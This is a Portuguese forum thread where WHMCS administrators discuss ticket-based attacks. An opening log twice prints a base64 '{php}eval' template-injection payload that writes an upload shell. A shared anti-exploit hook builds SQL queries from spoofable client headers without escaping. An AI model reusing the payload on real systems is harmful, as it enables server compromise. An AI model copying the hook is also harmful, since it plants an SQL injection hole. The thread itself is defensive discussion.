Jump to content

Tentativa de invsão no meu WHMCS


Recommended Posts

Tentativa de invasão

- 06/01/2012 04:25 - gabriel - 186.222.3.180

Email Sent to sni ([Ticket ID: 596391] {php}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php})

- 06/01/2012 04:19 - System - 188.117.109.110

Email Sent to sni ([Ticket ID: 528911] {php}eval(base64_decode('JGMzbyA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlXMWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzYjJGa0lpQXBJSHNOQ2dscFppaEFZMjl3ZVNna1gwWkpURVZUV3lkbWFXeGxKMTFiSjNSdGNGOXVZVzFsSjEwc0lDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmJtRnRaU2RkS1NrZ2V5QmxZMmh2SUNjOFlqNVZjR3h2WVdRZ1UxVkxVMFZUSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKTsNCiRyZWQgPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkcmVkLCRjM28pOw=='));{/php})

não é a primeira vez que acontece isso, é uma pena ter pessoas que querem fazer o mal para outras...

Link to comment
Share on other sites

Eu marquei a opção de que só pode criar ticket com login do cliente. Pelo menos, deu uma trégua..


O ruim é que se for um novo cliente querendo sanar uma pequena dúvida ficará difícil se cadastrar só para obter informações. E caso o WHMCS não permita o registro avulso ( Allow Client Registration ) daí complicará mais ainda... pois o cliente não comprará algo e depois sanará dúvidas!

Adaptei o código abaixo do Matt ( http://portaldohost.com.br/whmcs/onda-de-ataques-ao-whmcs-o-que-fazer ) possibilitando bloquear/banir o IP do atacante, não criar o ticket ( padrão ) e para mostrar a ele que você tá de saco cheio, a página será redirecionada para index.php que por sua vez irá redirecionar para banned.php

Simples! Crie o arquivo xyz.php na pasta /inludes/hooks/ com conteúdo abaixo:

 

<?php

# Hook Anti-Exploit 
# Caso você receba um ticket com assunto/mensagem {php}eval(base64_decode(… 
# O IP será banido até 2020 ( risos ) e você será notificado via "System Activity Log" /systemactivitylog.php
# Edvan Sampaio - whmcs@edvan.com.br
# www.edvan.com.br - www.whmcs.blog.br
 
if ((!strstr($_SERVER['REQUEST_URI'], $customadminpath) && $customadminpath) || !$customadminpath){
 
$dataservidor = date('d/m/Y - h:i:s');
 
$checkvars = array('subject','message');
foreach ($checkvars AS $checkvar) 
if (strpos($_REQUEST[$checkvar],'{php}')!==false) {
if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ip=$_SERVER['REMOTE_ADDR'];
}
 
$datalog = date('Y-m-d h:i:s');
 
$banir = mysql_query("INSERT INTO `tblbannedips` SET `ip`='$ip', `reason`='Ataque $dataservidor', `expires`='2020-06-06 01:12:3'");
$log = mysql_query("INSERT INTO `tblactivitylog` SET `date`='$datalog', `description`='Ataque $ip', `user`='System'");
 
header("Location: index.php");
exit ("");
}
}
?>

 

Link to comment
Share on other sites

Edvan, gostei muito da implementação e já apliquei aqui.

Pessoal, gostaria de saber se ao invés de colocar uma data fixa teria como pegar a data atual, acrescentar uma quantidade X de dias e efetuar o bloqueio com essa nova data.

Alguém poderia me "iluminar" em como capturar a data atual e efetuar esse cálculo?

Muito Obrigado!

Link to comment
Share on other sites

Edvan, gostei muito da implementação e já apliquei aqui.

Pessoal, gostaria de saber se ao invés de colocar uma data fixa teria como pegar a data atual, acrescentar uma quantidade X de dias e efetuar o bloqueio com essa nova data.

Alguém poderia me "iluminar" em como capturar a data atual e efetuar esse cálculo?

Muito Obrigado!

Não é complicado, veja abaixo como acrescentar 10 dias:

$dias = 10;

$xdata = "86400" * $dias +mktime(0,0,0,date('m'),date('d'),date('Y'));

$xdata = date("d/m/Y",$xdata);

Agora se eu fosse você não perdia tempo com isso.

Após eu postar essa dica um engraçadinho ( 186.213.121.30 ) http://www.maxmind.com/app/locate_demo_ip?ips=186.213.121.30 tentou fazer um teste kkk

Recebeu um block até 2020 kkk fiz outra customização que também mostra o bloqueio no System Activity Log http://awesomescreenshot.com/0f7rf56f2

Na linha:

$banir = mysql_query("INSERT INTO `tblbannedips` SET `ip`='$ip', `reason`='Ataque', `expires`='2020-12-12 01:12:3'");

Substitua para:

$datalog = date('Y-m-d h:i:s');

$banir = mysql_query("INSERT INTO `tblbannedips` SET `ip`='$ip', `reason`='Ataque $dataservidor', `expires`='2020-06-06 01:12:3'");

$log = mysql_query("INSERT INTO `tblactivitylog` SET `date`='$datalog', `description`='Ataque $ip', `user`='System'");

Abraços

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...